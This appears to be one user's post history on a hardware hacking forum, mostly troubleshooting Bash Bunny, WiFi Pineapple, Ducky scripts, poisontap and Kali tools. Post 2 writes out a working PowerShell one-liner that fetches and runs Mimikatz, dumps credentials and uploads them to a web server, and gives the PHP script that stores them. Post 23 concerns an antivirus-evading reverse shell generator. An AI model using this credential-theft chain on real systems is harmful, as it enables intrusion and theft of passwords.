TeCHemically

Everything posted by TeCHemically

  1. Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input")); So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately; but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!
  2. I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command like above: powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)" Here is the PHP script: <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> It was broken up like this before, but didn't seem to have any effect (I know almost nothing of PHP, so this probably makes no difference): <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> Thanks to any who reply!
  3. Windows 10 has patched lsass now which effectively breaks mimikatz functionality.
  4. So, the Duckhunter on nethunter uses 2 different elements to inject strings. One being STRING, like normal, and the other being TEXT. When you use STRING, the LF at the end of your line is interpreted as an ENTER keystroke. If you just want to enter a string then you need to use the TEXT element instead. I can see how this could make your scripts more efficient; but unless you know about this it just drives you crazy. Hope this helps someone!
  5. I am unable to use scripts that open CMD as admin because phantom ENTER lines are being executed after my "STRING cmd" lines in my ducky scripts. This is also happening other places. I have a workaround to get an admin prompt; but it is of no use because these ENTER keystrokes are being entered in places where they should not be; and since they aren't actually in the script I cannot remove them. It may be that the end of line EOL character (LF in this case) is being interpreted as an ENTER keystroke. Is there any way to convert all EOL characters in a file from LF or CRLF to some kind of NULL character so the Duckhunter HID conversion tool won't add in these ENTER keystrokes? Thanks to all who reply. This has been driving me nuts!
  6. I have not had any success with my bash bunny since I bought it on the day it launched. Install tools has never worked, no matter what workarounds have been posted to try. The payloads don't execute properly with the exception of a couple ducky payloads that executed a few times with issues. Now even the ducky script payloads fail to respond. I get no lights at all when trying to run the install tools payload. I would like to speak with someone about a replacement. This device has never worked and it does not behave at all like the readme files state it should. I fought with it so long that I just set it down for a few months and picked it back up again today. Still it's a whirlwind of fail. Please help me out here. I was so excited about this platform that I bought it on day one. I believe there is just some issue with the specific device I received. Any help and guidance is greatly appreciated!
  7. I got airodump results on a different laptop. Do you know if the cards in the hakshop are NEH or NHA? If this won't work on my main rig then I'm going to have to return it. Shame too. It was a great price. I hope Darren isn't carrying the crap shoot card that contains inconsistent chipsets.
  8. I just got the RT3070 usb adapter and airodump isn't working on any OS. Tried 3 systems so far and every one of them shows all blank once the card is in mon mode and I start airodump. I ran check kill so nothing is interfering with it. What's the deal with this card? Any help is appreciated.
  9. I have to agree that the vast majority of the time I have spent with my pineapples has been in troubleshooting, factory resetting, re-flashing, etc. The tool has great promise; but has never been stable for me in any true long term or feasible "deployment" sense. It has been fun to play with, while I'm not screaming at it for bugs I am fighting with; but I have never gotten any iteration to function in a consistent and stable way...and my first pineapple was a fon I built myself. So, I'm not talking about a passing fancy here. I've been involved with these things all the way up to the Mark V. Given my issues, and the fact that support for older models drops off very quickly, I just can't justify purchasing either of the newer models. Sad :(
  10. Following the DIP switch reset procedure so that should be good; but why am I getting permission denied with SCP and SSH? This has been the case across multiple factory resets.
  11. Found this; so I am factory resetting now. Hopefully this solves the issue. If anyone knows what is going on please do reply.: You can use the DIP switches to perform a factory reset but it sounds like you may be using the wrong switches or not using the correct procedure. Try this: NOTE: With the switches facing you, they are ordered 1 - 5 from left to right. 1) Power off your Pineapple. 2) Place your DIP switches in the following sequence: Switch 1 - UP Switch 2 - DOWN Switch 3 - DOWN Switch 4 - UP Switch 5 - UP 3) Power on your Pineapple 4) Wait 5 minutes just to be safe and power off again 5) Place all of your switches back in the up position again and power on. You should be good to go. Just connect via ethernet or Wifi, login to the web interface, and create a new password.
  12. I am unable to SCP or SSH to the mark V. Getting "permission denied" error for both. This has been constant prior to today; however, today when minimizing infusions they will no longer maximize again and I cannot factory reset or even properly reboot the device. So I need to be able to reflash it over SSH. Any ideas? Am I overlooking something here? Using port 22 for both.
  13. I have minimized several infusions and now they will not come back to the interface. Configuration is one of them so I cannot factory reset the pineapple. Trying to SSH in fails with permission denied. Is there a fix for this issue? How can I restore the infusions so they are accessible?
  14. Mode G appeared successful; but I was never able to get connected via screen to verify the bunny could get out. I am on an Ubuntu based distro. I tried ECM and RNDIS. RNDIS listed as ttyACM0 for a time; but now it won't list as a tty at all whether ECM or RNDIS. Even after reboots. It just seems absent for some reason; although it shows the eth1 in ifconfig
  15. When using mode C with bb.sh I get the following error: SIOCDELRT: No such process
  16. My bashbunny does not show a device in Win7 and the devmgr shows under "other devices" a "RNDIS" entry with the yellow exclamation symbol indicating driver failure. Trying to point it to the bunny as suggested for the similar problem for CDC Serial driver issues does not help. I followed the steps here as far as I could: http://wiki.bashbunny.com/?_escaped_fragment_=././index.md%23Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows#!././index.md%23Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows I've not had any success installing tools, connecting to internet, or anything else so far. It's been a pretty big let down for a first day. Any guidance is appreciated!
  17. I have set up and confirmed the functionality of this payload via tcpdump; but the Invoke mimikatz payload's "rx.php" fails to create .creds files. Confirmed appropriate permissions on the php script for www-data. Still nothing is created and no creds are captured. I can see them get sent to the server via packet capture; but if that's not running I don't ever see the creds files the rx.php script is supposed to create.
  18. Sorry, I wasn't clear in my post. I'm not referring to using this on any of my pineapples. I meant using poisontap in general according to the prescribed method.
  19. Has anyone gotten the poisontap to work successfully? It appears to function properly when looking at tcpdump on the target; but I never get anything reaching out to the nodejs control server. Also, how does one interact with the nodejs server? Navigating to the server's interface:port gives a "sorry unknown url" error.
  20. I am having the same issue with ettercap. It starts but once I hit refresh it immediately changes to "ettercap not running". Tried running it on br-lan & eth0.
  21. factory reset and SD format fixed issue, issue resolved (shotgun method)
  22. Ettercap and sslstrip will not install on my MK5. Notifications says they install successfully; but when I go back to the infusion list it says they need to be updated again. I have tried removing and rebooting but no love. Still does the same thing on these 2 infusions.
  23. This script is now failing in Kali. I have tried on 2 separate installs that are up to date and get the following error: [*] Generating shellcode No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload Found 0 compatible encoders reverse_powershell_ducky.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError) from reverse_powershell_ducky.rb:51:in `clean_shellcode' from reverse_powershell_ducky.rb:45:in `shellcode_gen' from reverse_powershell_ducky.rb:90:in `<main>' Any help is greatly appreciated as this is my go to method in testing due to its AV evasion ability. Also, would it be possible to have this script accept domain names as well as IP addresses?
  24. WOW, just...WOW man...the new simple-ducky is freaking BEAUTIFUL!!! Amazing work Skysploit; a true inspiration! Way to go and THANK YOU! :D :D